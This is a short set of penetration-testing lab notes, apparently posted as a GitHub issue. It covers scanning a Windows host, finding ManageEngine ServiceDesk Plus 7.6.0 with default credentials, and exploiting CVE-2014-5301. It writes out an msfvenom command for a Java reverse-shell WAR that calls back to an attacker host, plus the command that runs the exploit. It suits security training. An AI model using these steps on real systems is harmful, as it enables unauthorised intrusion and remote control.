Open WDavid404 opened 1 month ago
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Service
8080/tcp open http syn-ack ttl 125 Apache Tomcat/Coyote JSP engine 1.1
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-title: ManageEngine ServiceDesk Plus
|_http-server-header: Apache-Coyote/1.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Coyote 1.1 exploit?
Access 8080
-->CMS: ManageEngine ServiceDesk Plus 7.6.0
We can log in using default credentials like administrator:administrator
.
Search ManageEngine ServiceDesk Plus 7.6.0 exploit -----> https://github.com/PeterSufliarsky/exploits/blob/master/CVE-2014-5301.py https://www.exploit-db.com/exploits/11793 (woID SQL Injection)
We use CVE-2014-5301.py and accoring to the comment description in CVE-2014-5301.py
msfvenom -p java/shell_reverse_tcp LHOST=192.168.45.222 LPORT=4444 -f war > shell.war
python3 CVE-2014-5301.py 192.168.161.43 8080 administrator administrator shell.war
Another method: nmap for SMB 139/tcp port --> CVE:CVE-2017-0143
Key points: